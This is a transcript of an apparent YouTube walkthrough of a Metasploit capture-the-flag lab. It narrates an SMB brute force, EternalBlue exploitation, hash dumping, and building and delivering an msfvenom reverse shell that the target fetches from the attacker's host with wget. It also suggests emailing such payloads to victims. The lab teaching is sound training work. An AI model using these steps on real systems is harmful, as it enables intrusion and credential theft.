What's up, guys? So today we're covering the Metasploit exploitation. If you guys are liking these videos, please like and subscribe. It helps out a ton to the channel. Make sure you join the Discord below in the description. Will help out a ton as well. And I can answer any questions you guys may have when I'm not available for a YouTube comment or something like that. So let's go ahead and dive right into it. My dog wants down already. All right, let's dive right into it. So the last one we did was an introduction to Metasploit, and that was pretty good. But here we're going to actually exploit some machines and see what it actually can do. I will say that this is not all-inclusive, meaning this isn't all Metasploit can do. There's a lot that they can do, but this is a very good box. So first thing it's telling us to do is go ahead and start Microsoft I call it Microsoft Console every time. Metasploit Console. So go ahead and hit MSF Console. You can see, boom, there we go. We're in it. We'll start this machine. Now, you can see that it has its own port scan possibilities. Metasploit has all kinds of possibilities. So you can search port scan, and you'll get all these auxiliary scanners. And you can see port scan, acknowledge flag, FTP bounce, SYN scans, TCP, Christmas scans. So a lot of you may be thinking first thing, if you're familiar with the previous boxes we did, okay, cool, this has the ability to do all this stuff, but you have to use a different auxiliary scanner for each one when Nmap can do basically all of that for you, right? And you don't have to load anything new. Well, that's exactly right. You can go ahead and use Nmap inside the Microsoft console, or God bless it, the Metasploit framework console. So you can see here, if I just do Nmap and, well, it's not going to show us the IP for 15 seconds, but anyway, so you can use Nmap, and I recommend using Nmap personally, unless you're scanning for something specific. If you're scanning, like you can see here, this is the SAP router port scanner. If you're doing something like that, that's one thing. Now, when you do scan using port scans, you have to know a few things. So some of the options, when you show the options, you have to know what these are, okay? And I'll cover them here. So first thing, I want to get this going just to get it going while this is going. Okay, that was fast. All right, so the concurrency is the number of targets you scan simultaneously, okay? So the ports, that's the port range to be scanned. You should know what that is. The R host is the target or target network to be scanned. So the R host, you'll have to set that every time. The threads, the number of threads that you can do simultaneously. So more threads, the faster it is. Keep in mind, guys, when you do these, that if you bump these numbers way up, it's going to slow your computer down, okay? Because you're using your computing power to do this, and it will, start eating it very fastly. So now you can see here, they just ran Nmap directly in here, and that's what I recommend personally, unless you're doing something like this, UDP sweep, and it's giving you all the UDP information, okay? The SMB scans, these are important because SMB is very common. You can see here the enum shares, version number, that type of stuff. All those scanners are very important. I recommend those scanners, but for regular port scanning, I personally would use Nmap. So we did the Nmap scan. How many ports are open on the target system? And there it is, 5. Now it's asking us, using the relevant scanner, what NetBIOS name can you see? So what it's trying to show us here is if you search NetBIOS, right, and you say, hit enter. Now the only scanner here is auxiliary scanner NetBIOS and B name. That's the one we want. So if we want to use it, instead of actually typing all that out, we can just say use 3, boom, and you can see that we have to show the options. Now when we do that, we have to set the host, if you remember. So we'll say our hosts, and we'll go back up here to get the IP, 10.164.162, hit it, and we can run it. And that's going to take a second to run. Now, a lot of times this is as simple as it needs to be. If you know exactly what you're trying to get, you can search it in Metasploit, get the information here. Like we know what we're trying to do is we're trying to get a scanner. We know we're not trying to get spoof anything here. We're just trying to get the scanner and the NetBIOS name. And that's exactly what it's asking us is what is the NetBIOS name? So here it is. You can see it popped up. It's Acme IT support right here. Perfect. All right. So now what is running on port 8000? Now it wants you to use a scanning module for Metasploit here. I don't recommend it because look how fast and easy this is. So you just do SV 10.10.164.162, and make sure we put the port 8000, and that's it. For me, that's way faster than searching for the actual module, loading it, all that stuff. Now, it might not be faster for you. You guys might need that because you may not be very good at Nmap, and that's fine. There's nothing wrong with that. You can see here, here's the version number, WFS version 1.21, and there you go. And that's the format that they want. You'll see that format with the asterisks when the question is there, so you'll know what to put. Now, here's another one. What is the Penny's user SMB password? So you can see it says use the version or the word list mentioned in the previous task. So first thing we're going to do is search SMB login, I believe. There it is. Use 0. All right, so we'll need this file. So one thing I'll recommend, if you're using the attack box, don't download the task file. It's not going to do you any good. They already put it here for you. So we searched SMB login, and there's our scanner for it. So now we're going to do the options. What do we need to set? Well, first we need to set the R host for sure. And that's the 10.10.167.162. Whoops, 164.162. Okay. Now, we'll need to set the actual username. So set, and then it says, where is it here? SMB user. So we want to set SMB user, and that's Penny. If you remember, they told us to look for Penny's password. Now the other thing we want to set is the password file. So set pass file, and then we want to say right here, use the user share word lists Metasploit. And there's our word list. So now we've got that set. We've got all of our options set. We should be able to hit run, and boom, look at it go. And you can see there's our answer because it's the only one that isn't red. So it's the positive one. Success, not the failed one. So Penny, Leo1234 is her password, and you can see we got the right answer down here. Now, I will tell you guys, similar to Nmap in Metasploit, yes, you can use things like this to brute force theoretically, right? SMB is a little different, but Hydra, those tools that are made for password attacks, are much, much faster. You saw how slow this was. Now, I know it might have looked fast because it just went boom, but it's very slow in terms of a password brute force, okay? So just keep that stuff in mind, guys. Give me 1 second. I'm going to terminate this one and start this one. So it's there when we're ready. All right. So now the Metasploit database. Long story short, what is the Metasploit database? The Metasploit database is a database that starts on your computer that then whenever you actually are doing scans, Nmap scans, things like that, it will save all that information, put it in an easily readable format for you, and also allow you to, instead of have to set the options like set R hosts, you can just say set tac R, right? Or hosts, and it's going to pull that from the database and input it for you so you don't have to keep doing it. So you can see here you have different workspaces. The workspaces is, let's say you're doing a pen test and you're doing it on 3 different domains. So you're pen testing hackme.com, hackyou.com, and hackus.com, right? Those are 3 different workspaces. So it's going to save the hosts differently on each one. So you'd have to go back and forth from workspace to workspace if you're doing pen testing in those different things. So you can see here, they added a workspace called Try Hack Me. Boom. And now it's only going to save the information in that workspace until you tell it otherwise. And that's important because if you're doing different subnets even, for instance, and you want to separate them, all this stuff you can do. So you can see you can run Nmap using db tac nmap, and it's going to save all this information. Now watch how nice this is. Now all I have to type is hosts, and there's my host. And then if I just type services, here's all the services that are open on that host because of that Nmap scan. It's super readable, super easy. And then even nicer, if we're here and we're using this SMB here, all we do is type host tac R, and it's going to input that information for us. Now when you show the options, that's the host right there. We don't have to do that anymore. So keep that in mind, guys, that the database is really nice, but also keep in mind when you run it, it's going to be much, not slower, but it's going to slow your computer down a little bit, okay? Because it is running now a database on your computer. So if you don't have if you have just a kind of a computer, I don't necessarily recommend it unless you're doing a lot of hosts or something and you really need to separate them. But for the most part, you shouldn't have to do that, okay? All right, so now vulnerability scanning. And I know I'm going quick, guys, but I recorded this video once and it ended up being like 35 minutes and then my computer shut off. So that sucks. But the reason I'm going quickly is because I'm trying to get it under that 35 minutes because some of this is just reading material that it wants you to read. So, all right, so now finding vulnerabilities using Metasploit will rely heavily on your ability to scan, correct. So now you need the reason for that, they're saying that, is because, like for instance, if you scan and find that it has VNC, you can search VNC and find this scanner and then start enumerating more information. That's what they're getting from it. And then you can see here, they're just showing you, basically, you're going to get more information. So now, who wrote the module that allows us to check SMTP servers for Open Relay? So what they're trying to see is, can we find this module ourselves? So simple, you just search because they gave it to you, SMTP, and if you just search SMTP, you'll find it. But I know that it's SMTP relay. Boom, there it is. So we'll go ahead and say use 0 because that's the numbered here, 0. And then we'll say, I think you can do help. Let's see, will help do it? Nope, not help. Help wouldn't do it. So I thought help would do it, but help didn't. Info. And you can see provided by Campbell Murray. Perfect. So there's Campbell Murray. There's his name. Nailed it. So they want to make sure that you can find modules and get information on them. Once you have the module you need, it's easy. You show the options, you input what options it's asking for, and you can use it, right? All right. So now we're diving into the actual exploitation. This is where the fun begins, guys. So I'm not going to cover all this because we're about to do it. So that's a nice thing. So you can see here, this is the only thing I will cover. So when you upload a module, when you show the payloads, this is showing there's a lot of options for payloads. You don't have to do the default one. That's what it's showing. You can actually get information about these same way as before and all that. And this will allow you to do different things on hosts. So keep that in mind, that just because it pops up and says no payload selected, default reverse TCP, doesn't mean you have to use that reverse TCP, okay? You can do whatever payload you want. So here we go, boom, boom. This is showing you that they're setting the L host, exploiting it, perfect. All right, now, when you have a actual session created, meaning you got connection with them, you can hit Control-Z and background that session, so then you can move on to something else and come back to it later. You'll just type sessions, tac I, and you can see it's going to give you all the information about the sessions, and you can see this one's number is 1. So if you do sessions tac I 1, you'll actually connect to the first one. Now, if there's 5 here and you do sessions tac I 5, you're going to get the 5th one, etc., etc. So it's a way to keep connections open while still maintaining what you're doing. All right, so now this is more what you're going to see on a capture the flag type situation. All you're going to get is, boom, exploit one of the critical vulnerabilities on the target. Okay, so we have a new target. Perfect. So what we're going to do is we're going to say nmap. So we're going to do the SC and the SV. Actually, I won't do the SV. I'll just do the SC. So the SC, what this is, if you guys aren't familiar, is it's going to try and run the scripts, but basically the SC is going to give us a little more information than the original nmap scan. And the reason I'm doing it is because we're looking for a specific vulnerability. Apparently it's a critical vulnerability. So we're looking for a little bit more information, and I know that this scan specifically will give it to us. You can start off by doing whatever scan you feel comfortable with and see if it gives you the information you need. Now, I will tell you, they kind of give you a little hint. If you guys didn't notice, they did the eternal blue the entire time up here. So Windows, SMB, eternal blue, that's kind of a hint. And what they're saying is this is how you do it. So if you guys get stuck on this step, scroll up, look at what they walked you through, because they don't tell you that's what they're trying to get you to do. They just are showing it to you and then have you do it. So that's what we're going to do here. So we'll wait for it to pop up, but if you hit the hint, you can see the target is missing MS17010 patch. So if you guys aren't familiar with what that is, that just means it's missing the patch. If you look up the vulnerability, or if you look up the MS17010, you're going to see that's vulnerable for Eternal Blue. So you can see here, they're on Windows 7, Service Pack 1, meaning it's never been updated. So we're pretty certain it's vulnerable, right? So now we can go ahead. We know it's vulnerable, and we know what it's vulnerable for, because if you do any research at all, you're going to get that Windows 7 Professional 6.1 is vulnerable to Eternal Blue, okay? And you're going to see how easy Eternal Blue is to exploit. So you're going to say use exploit Windows SMB MS17010 Eternal Blue. All right, so when we use that, we'll show options, and you'll see that all we're going to need to set is the host. So set our hosts, and it's 10.10. Okay, it keeps telling me that, and I can't extend, so I don't know. Hopefully it doesn't crash on me. All right, so set our host 10.10. What was it? 167.87, and then we'll run it, and we'll get a connection. And it's that easy. You literally only have to set the R host on that one. So Eternal Blue is very easy to take over. You can see it. Now, here's where you're going to get an interpreter session for the first time. Perfect. And it's asking us what's the contents of the flag.txt file. So we'll search F for file, and we're going to say flag.txt, and we're going to let that run, and it's going to find us where that flag is. And then we just have to go to that flag and pull it or look at it. So keep in mind, interpreter uses Linux commands. So if you're familiar with Linux, you know you can actually cd to change directory, and then you can cat when you get there to actually view the contents of this file. And you can see there's the actual flag. Now, what is the NTLM hash? That is pretty much all you have to do whenever you have an interpreter. If it works, now keep in mind, not every interpreter command is going to work on every box. That's just obvious, I guess. But basically, I'm going to go ahead and cancel that flag search because I don't want to wait for it any longer. The flag is actually in the C users John documents, if you guys are looking for it. So C users John documents. I don't want it to sit or to make this video any longer than it needs to be. So now we're just going to do a hash dump, and it's going to pull those hashes. And there you go. There's your hash right there. So there's your password for pirate. Okay. Now you just have to take it offline and crack it. So I know that sounds easy, or it sounds easy, but it's a little bit harder than you think, but it's not that bad. All right. So now we can go ahead and exit this. Whoops. It actually, what happened there is it started that other box for us. So we'll exit this session. Okay. Clear it back out. I like to have it cleared. So now we're going to cover msfvenom. So we just took over our first box, guys. That's a big step in this, especially if you guys are new to Metasploit. You just took over your first box in Metasploit, and you have full control. Mess with it. Start using, looking at their screen. Use the help command to look at what commands you can run. You can take screenshots. You can play audio files on their computer. You can do all kinds of stuff. So have fun with it. So now, msfvenom. What is msfvenom in a nutshell? msfvenom allows you to take the payloads that Metasploit uses and take them and hold them as a raw file. Now, the reason that's important is because if you can upload a file to a server and then run it, then you have control, right? If you can upload a PHP file, for instance, to a website, and then you can go to it, you can run it, and then you'll be set, right? So that's what they're showing here. One thing I'll tell you guys is they let you click the box here. I would not do that. I would SSH into it because, and it'll tell you that here, SSH into it because every time you click off of it, it logs you out, and it's a pain in the butt because it will terminate the executable. So anyway, so msfvenom, what is it? So it lets you take all these different payloads, and create them in a raw format. So you can see here, msfvenom, payload, PHP, interpreter, reverse TCP connection. And it's saying you just have to set the L host, which is you, and then whatever port you want, and then the file, raw, E for encoded, and PHP base 64. So it's a PHP base 64 encoded file, and that's what he wants. He wants to have it, and you can see there's the whole file. But it's base 64 encoded, so he can now use it the way he wants. Now a handler is a listener. If you guys are familiar with Netcat listeners, that's what they're saying here. They're saying, let's run this reverse shell, and then let's have a handler sitting back waiting for it, and then we can actually connect using a interpreter session. Now it's showing here PHP, it's going to be made with comments in it. You have to go in and take the comments out and end the file. No big deal. That's pretty simple. You guys can, anytime you're having an issue with that, you can probably Google it and it'll pop right up for you guys. So now use exploit multi-handler. So this is the multi-handler. It's kind of like the Netcat listener. You just have to set what port and what host you're going to be using. Okay. I don't know what to tell it. It tells me I'm out of time. Okay. Not sure. Give me a sec. It said we're out of time. Okay, so we're good now. I think we're good. All right. So now we're in. So let's go ahead and create our payload. So here they're giving you the actual information. So we're going to say msfvenom. So this will allow you to create these payloads and have the file as just a regular file that you can then upload or do whatever you want with it. So we're going to say Linux x86. We're going to say interpreter reverse TCP, and then we just have to set the L hosts, excuse me, and that's our IP. So 10.10.57.173. That's my IP currently on this. Now we have to set the port, L port equals. Now I just use 1234. You can use whatever you want. Now we're gonna say file for. This is the format, which is ELF. Now if you guys aren't familiar, ELF is a executable on a Linux machine. So we're gonna name it reverse shell.elf. Okay. Now we hit enter, and you see it's gonna make it for us. So it's gonna make that payload and insert these what we need instead of us having to do any of that. So now it's already, you can see if I hit ls, it's already right here, reverse shell.elf. So now all we got to do is Python 3. Okay, now what we're going to do here is we're going to make a simple HTTP simple server. If you guys aren't familiar with what that is, all it is making the actual file available for the other target machine. Now you'll see here, Python 3 tac m http.server, and we're going to just use the same port they tell us, 9000, and we hit enter, and it's loaded up. Now what this is, if you guys aren't familiar, I'll just show you real quick since we do have a little bit of time. So if you guys aren't familiar with what this is, all it is Python has a module where you can go here and you can say HTTP 127.0. So you can host, if you will, a simple server, okay? And boom, there's all of our files that are available for them to grab based on what directory we were in when we did it, okay? So hopefully that makes sense to you guys, and you can see there's our reverse shell.elf. So it's being hosted for them. They're waiting for it. So now all we got to do is SSHN Murphy, and they give you this information right here. They give you the his name and login information, so you can SSH in. So Murphy at 10.10.230.153, and we're gonna say yes, and then the password they give it to you. Now first thing I'm gonna do is sudo su, because this guy has permissions, and they tell you that. Now we're root, okay, perfect. So a lot of you would probably say, well, if you're root, why would we even need to? I also don't understand why it says start machine when I have it started. Okay, anyway, if we're root, why do we need to do anything, right? We have the access. That's true. What we're trying to do is we're trying to show you guys what msfvenom can do. So we need to get the file onto this machine. So we'll go ahead and hit wget and then http 10.10.57.173, which is our machine. And we're going to say port 9000. And then we're going to go ahead and say reverse, what was it? Reverse Linux. I don't even remember what we named it as. Reverse shell.elf. Reverse shell.elf. So now you see if we hit ls on the, or SSH into the target machine, there it is. So keep in mind too, whenever you put a new file on a Linux machine, typically you have to change the permissions to execute it. So 777, change mod 777 will give you that. Now when we ls it, it's green because we can run it. So now we have the file in place. We have the file. Now we just need to execute it, right? Well, we have to set up the multi-handler. So we're going to say use exploit multi-handler. Okay. Now we need to set the payload. And the payload is the same as the one we used before, which is the Linux one. So we're going to set payload to Linux x86 interpreter reverse TCP. Okay. Maybe I spelled it wrong. Whoops. So payload probably needs to be all caps. Okay, I probably spelled it wrong. That's all right. I wrote it down here to make sure I've got it right. Maybe I don't have to put the equals in there. I don't think you have to on payload. Okay, there you go. So you just don't put the equals in there on payload. So you can see set payload. There we go. So the payload, it's expecting what this file is going to execute. So it's now expecting it. So now we have to set show options. And we're going to set the host, the L host. Now keep in mind the L host is us again. Okay. So set L host 10.10.57 or 57.173. Now, also, you notice the port is 4444. We need to set that because we named it 1234 in the actual file, if you remember that. So now we have this going. We can run it, and you notice it just sits there. It's listening. It's waiting for us to run this file. When we run the file, reverse shell.elf, we run it. Boom, we have a interpreter session. We're in. So I know it's a long way to get what we already wanted, but look at the different options we have too. Because before, let's say here, even though we have root access, we wanted to get all their hashes or something. Well, we would have to do we would have to just go to the file and look at them, but we can actually do that directly here. So it says here, what is the other user's password hash? Now again, you can go directly to the file if you wanted to. I wouldn't. But what you can do instead is run, these are called post-exploitation exploits. So these post Linux, and it doesn't let you tap, there it does. Okay, gather, and then you can see hash dump. Now, I know before we were able to do hash dump, but because it's a Linux box, it's probably not going to work. So we run the post Linux hash dump, and boom, there's Claire's hash dump. That's the other person. So that now we have a interpreter session. We can do a lot more things with interpreter sessions that usually you could do, but it takes you a little bit longer. So if you type help, you can see some of these are the commands. Now some of these will work, some of these won't, because they are different on different things. So like start a video chat. If they don't have a webcam, it's not going to matter, right? So let's see. Let's look for something we could do. So obviously you can do all these commands in Linux. So this is nice. It's really nice in my opinion if you're used to Linux or you like Linux like I do and you are on a Windows box or something. It's a little easier to use. But you can see we actually have a reverse shell Now, a lot of you might say, well, yeah, you logged in and you execute a file, so obviously you could get the reverse shell, blah, blah, blah. Okay, great. The thing is, there's a lot of web servers that allow you to upload files. When you can upload it, you can then access or go to that website and play it. And when you do, you can now reverse shell back to the box. There's a lot of things like that. If you could send it to someone in an email and get them to run it, now you have a reverse shell into their box. So there's a lot of times where msfvenom is very useful, and it will actually come in handy to go ahead and create your payload. So keep that in mind, guys. This box is very useful. Even if you don't realize the use of it yet, try and get good at it, because if you're good at it, you can do a lot of damage in a pen test. So keep that in mind, guys. Hopefully you guys like it. If you do, I try to keep this one a little bit short, but if you do like it, let me know, and we'll keep this train rolling. And hopefully we're almost to 300 subs. When we get to 500, we're going to do something special. I'm just not sure what it is. I might do like a rubber ducky giveaway or a keylogger giveaway or something like that. So let me know, guys, what you guys think. And hopefully you guys are enjoying it. And thanks for the support.